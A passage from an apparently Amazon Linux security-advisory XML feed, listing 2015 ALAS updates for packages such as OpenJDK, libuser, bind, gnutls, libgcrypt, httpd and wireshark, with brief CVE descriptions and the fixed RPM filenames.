</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0383" title="" id="CVE-2015-0383" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2590" title="" id="CVE-2015-2590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2601" title="" id="CVE-2015-2601" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2621" title="" id="CVE-2015-2621" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2625" title="" id="CVE-2015-2625" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2628" title="" id="CVE-2015-2628" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2632" title="" id="CVE-2015-2632" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2659" title="" id="CVE-2015-2659" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2808" title="" id="CVE-2015-2808" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3149" title="" id="CVE-2015-3149" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000" title="" id="CVE-2015-4000" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4731" title="" id="CVE-2015-4731" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4732" title="" id="CVE-2015-4732" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4733" title="" id="CVE-2015-4733" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4748" title="" id="CVE-2015-4748" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4749" title="" id="CVE-2015-4749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4760" title="" id="CVE-2015-4760" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1228.html" title="" id="RHSA-2015:1228" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.51-1.b16.6.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.51-1.b16.6.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.51-1.b16.6.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.51-1.b16.6.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.51-1.b16.6.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.51-1.b16.6.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.51-1.b16.6.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.51-1.b16.6.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.51-1.b16.6.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.51-1.b16.6.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.51-1.b16.6.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.51-1.b16.6.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.51-1.b16.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-572</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-572: important priority package update for usermode libuser</title><issued date="2015-07-23 10:50:00" /><updated date="2015-07-27 17:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3246:
Two flaws were found in the way the libuser library handled the /etc/passwd file. A local attacker could use an application compiled against libuser (for example, userhelper) to manipulate the /etc/passwd file, which could result in a denial of service or possibly allow the attacker to escalate their privileges to root.
CVE-2015-3245:
libuser does not filter newline characters in the GECOS field.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3245" title="" id="CVE-2015-3245" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3246" title="" id="CVE-2015-3246" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1482.html" title="" id="RHSA-2015:1482" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="usermode" version="1.102" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/usermode-1.102-3.18.amzn1.x86_64.rpm</filename></package><package name="usermode-debuginfo" version="1.102" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/usermode-debuginfo-1.102-3.18.amzn1.x86_64.rpm</filename></package><package name="usermode" version="1.102" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/usermode-1.102-3.18.amzn1.i686.rpm</filename></package><package name="usermode-debuginfo" version="1.102" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/usermode-debuginfo-1.102-3.18.amzn1.i686.rpm</filename></package><package name="libuser-devel" version="0.56.13" release="8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libuser-devel-0.56.13-8.15.amzn1.x86_64.rpm</filename></package><package name="libuser-python" version="0.56.13" release="8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libuser-python-0.56.13-8.15.amzn1.x86_64.rpm</filename></package><package name="libuser-debuginfo" version="0.56.13" release="8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libuser-debuginfo-0.56.13-8.15.amzn1.x86_64.rpm</filename></package><package name="libuser" version="0.56.13" release="8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libuser-0.56.13-8.15.amzn1.x86_64.rpm</filename></package><package name="libuser-python" version="0.56.13" release="8.15.amzn1" epoch="0" arch="i686"><filename>Packages/libuser-python-0.56.13-8.15.amzn1.i686.rpm</filename></package><package name="libuser" version="0.56.13" release="8.15.amzn1" epoch="0" arch="i686"><filename>Packages/libuser-0.56.13-8.15.amzn1.i686.rpm</filename></package><package name="libuser-debuginfo" version="0.56.13" release="8.15.amzn1" epoch="0" arch="i686"><filename>Packages/libuser-debuginfo-0.56.13-8.15.amzn1.i686.rpm</filename></package><package name="libuser-devel" version="0.56.13" release="8.15.amzn1" epoch="0" arch="i686"><filename>Packages/libuser-devel-0.56.13-8.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-573</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-573: critical priority package update for bind</title><issued date="2015-07-28 11:32:00" /><updated date="2015-07-28 11:32:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5477:
Embargoed
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477" title="" id="CVE-2015-5477" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-sdb" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.38.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.38.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.30.rc1.38.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.30.rc1.38.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.30.rc1.38.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.38.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.30.rc1.38.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.30.rc1.38.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.38.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.38.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.30.rc1.38.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.30.rc1.38.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.30.rc1.38.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.38.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-574</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-574: low priority package update for gnupg2</title><issued date="2015-07-28 11:35:00" /><updated date="2015-07-28 11:35:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1606:
1193008:
CVE-2015-1606 gnupg2: invalid memory read using a garbled keyring
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1606" title="" id="CVE-2015-1606" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg2-debuginfo" version="2.0.28" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-debuginfo-2.0.28-1.30.amzn1.x86_64.rpm</filename></package><package name="gnupg2-smime" version="2.0.28" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-smime-2.0.28-1.30.amzn1.x86_64.rpm</filename></package><package name="gnupg2" version="2.0.28" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-2.0.28-1.30.amzn1.x86_64.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.28" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-debuginfo-2.0.28-1.30.amzn1.i686.rpm</filename></package><package name="gnupg2" version="2.0.28" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-2.0.28-1.30.amzn1.i686.rpm</filename></package><package name="gnupg2-smime" version="2.0.28" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-smime-2.0.28-1.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-575</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-575: medium priority package update for gnutls</title><issued date="2015-08-04 11:36:00" /><updated date="2015-08-04 17:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0294:
It was discovered that GnuTLS did not check if all sections of X.509 certificates indicate the same signature algorithm. This flaw, in combination with a different flaw, could possibly lead to a bypass of the certificate signature check.
CVE-2015-0282:
It was found that GnuTLS did not verify whether a hashing algorithm listed in a signature matched the hashing algorithm listed in the certificate. An attacker could create a certificate that used a different hashing algorithm than it claimed, possibly causing GnuTLS to use an insecure, disallowed hashing algorithm during certificate verification.
CVE-2014-8155:
It was found that GnuTLS did not check activation and expiration dates of CA certificates. This could cause an application using GnuTLS to incorrectly accept a certificate as valid when its issuing CA is already expired.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8155" title="" id="CVE-2014-8155" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0282" title="" id="CVE-2015-0282" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0294" title="" id="CVE-2015-0294" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1457.html" title="" id="RHSA-2015:1457" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnutls-debuginfo" version="2.8.5" release="18.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-debuginfo-2.8.5-18.14.amzn1.x86_64.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="18.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-guile-2.8.5-18.14.amzn1.x86_64.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="18.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-utils-2.8.5-18.14.amzn1.x86_64.rpm</filename></package><package name="gnutls" version="2.8.5" release="18.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-2.8.5-18.14.amzn1.x86_64.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="18.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-devel-2.8.5-18.14.amzn1.x86_64.rpm</filename></package><package name="gnutls" version="2.8.5" release="18.14.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-2.8.5-18.14.amzn1.i686.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="18.14.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-debuginfo-2.8.5-18.14.amzn1.i686.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="18.14.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-devel-2.8.5-18.14.amzn1.i686.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="18.14.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-guile-2.8.5-18.14.amzn1.i686.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="18.14.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-utils-2.8.5-18.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-576</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-576: medium priority package update for tigervnc</title><issued date="2015-08-04 17:16:00" /><updated date="2015-08-04 17:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0011:
1050928:
CVE-2014-0011 tigervnc: ZRLE decoding heap-based buffer overflow in vncviewer
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0011" title="" id="CVE-2014-0011" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tigervnc-server-module" version="1.3.0" release="7.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-module-1.3.0-7.23.amzn1.x86_64.rpm</filename></package><package name="tigervnc" version="1.3.0" release="7.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-1.3.0-7.23.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server" version="1.3.0" release="7.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-1.3.0-7.23.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.3.0" release="7.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-debuginfo-1.3.0-7.23.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.3.0" release="7.23.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-debuginfo-1.3.0-7.23.amzn1.i686.rpm</filename></package><package name="tigervnc-server-module" version="1.3.0" release="7.23.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-module-1.3.0-7.23.amzn1.i686.rpm</filename></package><package name="tigervnc-server" version="1.3.0" release="7.23.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-1.3.0-7.23.amzn1.i686.rpm</filename></package><package name="tigervnc" version="1.3.0" release="7.23.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-1.3.0-7.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-577</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-577: medium priority package update for libgcrypt</title><issued date="2015-08-04 17:43:00" /><updated date="2015-08-04 17:55:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0837:
1198147:
CVE-2015-0837 libgcrypt: last-level cache side-channel attack
CVE-2014-5270:
Libgcrypt before 1.5.4, as used in GnuPG and other products, does not properly perform ciphertext normalization and ciphertext randomization, which makes it easier for physically proximate attackers to conduct key-extraction attacks by leveraging the ability to collect voltage data from exposed metal, a different vector than CVE-2013-4576.
1128531:
CVE-2014-5270 libgcrypt: ELGAMAL side-channel attack
CVE-2014-3591:
1198145:
CVE-2014-3591 libgcrypt: use ciphertext blinding for Elgamal decryption (new side-channel attack)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3591" title="" id="CVE-2014-3591" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5270" title="" id="CVE-2014-5270" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0837" title="" id="CVE-2015-0837" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libgcrypt-devel" version="1.5.3" release="12.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-devel-1.5.3-12.18.amzn1.x86_64.rpm</filename></package><package name="libgcrypt-debuginfo" version="1.5.3" release="12.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-debuginfo-1.5.3-12.18.amzn1.x86_64.rpm</filename></package><package name="libgcrypt" version="1.5.3" release="12.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-1.5.3-12.18.amzn1.x86_64.rpm</filename></package><package name="libgcrypt-debuginfo" version="1.5.3" release="12.18.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-debuginfo-1.5.3-12.18.amzn1.i686.rpm</filename></package><package name="libgcrypt-devel" version="1.5.3" release="12.18.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-devel-1.5.3-12.18.amzn1.i686.rpm</filename></package><package name="libgcrypt" version="1.5.3" release="12.18.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-1.5.3-12.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-578</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-578: medium priority package update for httpd</title><issued date="2015-08-17 12:23:00" /><updated date="2015-08-17 12:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3183:
Multiple flaws were found in the way httpd parsed HTTP requests and responses using chunked transfer encoding. A remote attacker could use these flaws to create a specially crafted request, which httpd would decode differently from an HTTP proxy software in front of it, possibly leading to HTTP request smuggling attacks.
1243887:
CVE-2015-3183 httpd: HTTP request smuggling attack against chunked request parser
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3183" title="" id="CVE-2015-3183" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd-debuginfo" version="2.2.31" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.31-1.6.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.31" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.31-1.6.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.31" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.31-1.6.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.31" release="1.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.31-1.6.amzn1.x86_64.rpm</filename></package><package name="httpd" version="2.2.31" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.31-1.6.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.31" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.31-1.6.amzn1.noarch.rpm</filename></package><package name="httpd-devel" version="2.2.31" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.31-1.6.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.31" release="1.6.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.31-1.6.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.31" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.31-1.6.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.31" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.31-1.6.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.31" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.31-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-579</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-579: medium priority package update for httpd24</title><issued date="2015-08-17 12:27:00" /><updated date="2015-08-17 12:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3185:
It was discovered that in httpd 2.4, the internal API function ap_some_auth_required() could incorrectly indicate that a request was authenticated even when no authentication was used. An httpd module using this API function could consequently allow access that should have been denied.
1243888:
CVE-2015-3185 httpd: ap_some_auth_required() does not properly indicate authenticated request in 2.4
CVE-2015-3183:
Multiple flaws were found in the way httpd parsed HTTP requests and responses using chunked transfer encoding. A remote attacker could use these flaws to create a specially crafted request, which httpd would decode differently from an HTTP proxy software in front of it, possibly leading to HTTP request smuggling attacks.
1243887:
CVE-2015-3183 httpd: HTTP request smuggling attack against chunked request parser
CVE-2015-0253:
A NULL pointer dereference flaw was found in the way httpd generated certain error responses. A remote attacker could possibly use this flaw crash the httpd child process using a request that triggers a certain HTTP error.
1243891:
CVE-2015-0253 httpd: NULL pointer dereference crash with ErrorDocument 400 pointing to a local URL-path
CVE-2015-0228:
A denial of service flaw was found in the way the mod_lua httpd module processed certain WebSocket Ping requests. A remote attacker could send a specially crafted WebSocket Ping packet that would cause the httpd child process to crash.
1202988:
CVE-2015-0228 httpd: Possible mod_lua crash due to websocket bug
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0228" title="" id="CVE-2015-0228" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0253" title="" id="CVE-2015-0253" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3183" title="" id="CVE-2015-3183" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3185" title="" id="CVE-2015-3185" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-devel" version="2.4.16" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.16-1.62.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.16" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.16-1.62.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.16" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.16-1.62.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.16" release="1.62.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.16-1.62.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.16" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.16-1.62.amzn1.noarch.rpm</filename></package><package name="httpd24" version="2.4.16" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.16-1.62.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.16" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.16-1.62.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.16" release="1.62.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.16-1.62.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.16" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.16-1.62.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.16" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.16-1.62.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.16" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.16-1.62.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.16" release="1.62.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.16-1.62.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.16" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.16-1.62.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.16" release="1.62.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.16-1.62.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.16" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.16-1.62.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.16" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.16-1.62.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.16" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.16-1.62.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-580</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-580: medium priority package update for wireshark</title><issued date="2015-08-17 12:29:00" /><updated date="2015-08-17 12:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2191:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2015-2189:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2015-0564:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2015-0562:
